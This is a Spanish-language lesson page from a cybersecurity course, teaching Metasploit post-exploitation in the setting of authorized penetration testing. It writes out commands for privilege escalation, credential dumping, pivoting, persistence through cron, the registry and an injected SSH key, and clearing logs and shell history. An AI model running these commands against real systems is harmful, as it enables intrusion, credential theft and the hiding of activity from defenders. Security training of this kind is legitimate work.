Cyber Security Academy · Lección

Postexplotación: pivotar y persistir

Utilice los módulos post de Metasploit para escalar privilegios, extraer credenciales y establecer persistencia.

Lección 4 de 413 pasos

Postexplotación: pivotar y persistir es una lección gratuita de Cyber Security Academy en CoddyKit. Esta es la lección 4 de 4. Puedes leer la lección completa abajo gratuitamente — luego la practicas en el navegador con un editor de código integrado y un tutor de IA 24/7. Forma parte de la ruta de aprendizaje de Cyber Security Academy, y tu progreso se sincroniza en la web y la app de CoddyKit. El curso de Cyber Security Academy incluye 4 lecciones en total.

Objetivos de la pos-explotación

Después del acceso inicial, los objetivos del atacante son escalar privilegios, recopilar información, mantener el acceso persistente y desplazarse lateralmente para alcanzar el objetivo real (datos, sistemas o control del dominio).

Conocimiento de la situación

Los primeros pasos después de obtener una shell consisten en comprender dónde se encuentra. Recopile información del sistema, configuración de red, privilegios del usuario actual, procesos en ejecución y variables de entorno.

meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/linux/gather/enum_system

Escalada de privilegios

La escalada local de privilegios permite pasar de una shell con pocos privilegios a root/SYSTEM. El local_exploit_suggester de Metasploit identifica exploits locales o del kernel aplicables según la versión del sistema operativo del objetivo.

meterpreter > run post/multi/recon/local_exploit_suggester

# Identifies applicable exploits
# Then:
msf6 > use exploit/linux/local/cve_2021_4034_pwnkit
msf6 > set SESSION 1
msf6 > run

Obtención de credenciales

Recopile credenciales: contraseñas con hash, credenciales en texto plano en archivos de configuración, contraseñas guardadas en navegadores y claves SSH. Estos elementos permiten el desplazamiento lateral y la persistencia.

meterpreter > run post/linux/gather/hashdump
meterpreter > run post/windows/gather/credentials/credential_collector
meterpreter > run post/multi/gather/ssh_creds

# Check env vars for cleartext creds:
meterpreter > run post/multi/gather/env

Pivotaje: reenvío de puertos

El pivotaje utiliza un host comprometido como puente para alcanzar redes internas aisladas. El portfwd de Metasploit crea reenvíos de puertos locales a través de la sesión de Meterpreter.

# Forward local port 3306 to internal DB
meterpreter > portfwd add -l 3306 -p 3306 -r 10.10.10.20

# Now connect locally:
mysql -h 127.0.0.1 -P 3306 -u root

Enrutamiento a través de sesiones

El módulo route de Metasploit añade rutas de red a través de una sesión, lo que permite que otros módulos alcancen redes a las que solo se puede acceder mediante el host de pivotaje.

msf6 > route add 10.10.10.0/24 1   # route via session 1
msf6 > route print

# Now run modules targeting 10.10.10.x
# through session 1 as pivot

Pivotaje mediante proxy SOCKS

Un proxy SOCKS mediante Metasploit (o chisel/ssh -D) permite enrutar herramientas arbitrarias a través del host de pivotaje usando proxychains, lo que permite que nmap, curl y los navegadores accedan a redes internas.

# Set up SOCKS proxy through session
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > set VERSION 5
msf6 > run -j

# Route tools through proxy
proxychains nmap -sT 10.10.10.0/24

Mecanismos de persistencia

La persistencia garantiza que el acceso sobreviva a los reinicios y a la pérdida de sesiones. Algunos métodos habituales son los trabajos cron (Linux), las claves de ejecución del registro (Windows), la inyección de claves SSH en authorized_keys y la instalación de servicios.

# Linux: cron-based persistence
meterpreter > run post/linux/manage/cron_persistence

# Windows: registry
meterpreter > run post/windows/manage/persistence_exe

# SSH key injection
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys

Ocultación de rastros

Los atacantes borran registros para mantener el sigilo. Nota de seguridad: las soluciones SIEM y EDR modernas envían los registros fuera del host en tiempo real; borrar los registros locales no elimina los registros centralizados.

meterpreter > clearev          # clear Windows event logs

# Linux: clear bash history
unset HISTFILE
cat /dev/null > ~/.bash_history

Módulos de pos-explotación

Metasploit incluye cientos de módulos de pos-explotación para Windows y Linux: recopilación de credenciales, datos del navegador, registro de pulsaciones de teclas, captura de pantalla y enumeración de red.

msf6 > use post/windows/gather/enum_logged_on_users
msf6 > use post/multi/gather/browser_history
msf6 > use post/windows/gather/screen_spy
msf6 > set SESSION 1
msf6 > run

Saber cuándo detenerse

En las pruebas de penetración autorizadas, deténgase cuando alcance el objetivo acordado en el alcance o encuentre datos a los que no tenga autorización para acceder. Documente cuidadosamente su recorrido: esta es la cadena de ataque que debe incluir en el informe.

Comprobación rápida

¿Qué permite el comando "route add" de Metasploit?

Resumen: Pos-explotación

La pos-explotación se basa en el acceso inicial para lograr un impacto real: escalada de privilegios, obtención de credenciales, desplazamiento lateral y persistencia. Metasploit proporciona módulos de pos-explotación para cada fase. Documente cada paso: la cadena de ataque desde la entrada hasta el objetivo es el principal entregable de una prueba de penetración.

Gratis para empezar

Aprende Cyber Security Academy con un tutor de IA — gratis

Escribe y ejecuta código real en tu navegador, obtén ayuda instantánea de un tutor de IA disponible 24/7 y continúa donde lo dejaste en la web o en la aplicación.

Cursos
76
Lecciones
303

Preguntas frecuentes

¿La lección «Postexplotación: pivotar y persistir» es gratis?

Sí — el texto completo de «Postexplotación: pivotar y persistir» es gratis para leer aquí en la web. Para practicarla de forma interactiva (editor de código integrado y tutor de IA 24/7) y desbloquear el resto del curso de Cyber Security Academy, actualiza a CoddyKit PRO. El curso de Cyber Security Academy incluye 4 lecciones en total.

¿Qué aprenderé en «Postexplotación: pivotar y persistir»?

Utilice los módulos post de Metasploit para escalar privilegios, extraer credenciales y establecer persistencia. Practicas Cyber Security Academy con código real que ejecutas directamente en el navegador, y un tutor de IA 24/7 responde tus preguntas mientras trabajas en la lección.

¿Necesito experiencia previa para empezar Cyber Security Academy?

No se requiere experiencia previa. Cyber Security Academy en CoddyKit está estructurado para principiantes hasta estudiantes avanzados, así que puedes empezar aquí o desde el inicio y avanzar a tu ritmo. Esta es la lección 4 de 4.

¿Cuánto tiempo toma la lección «Postexplotación: pivotar y persistir»?

La mayoría de las lecciones de CoddyKit toman alrededor de 5–10 minutos. Cada una es compacta e interactiva, así que avanzas constantemente y retomas exactamente por donde dejaste en la web y la app.

¿Puedo escribir y ejecutar código en esta lección de Cyber Security Academy?

Sí. Cada lección de Cyber Security Academy incluye un editor de código integrado, así que escribes y ejecutas código real directamente en tu navegador y obtienes retroalimentación instantánea de IA — sin configuración local necesaria.

Todas las lecciones de este curso

  1. Arquitectura de Metasploit y msfconsole
  2. Explotación de una vulnerabilidad conocida
  3. Payloads: con etapas y sin etapas, Meterpreter
  4. Postexplotación: pivotar y persistir
← Volver a Cyber Security Academy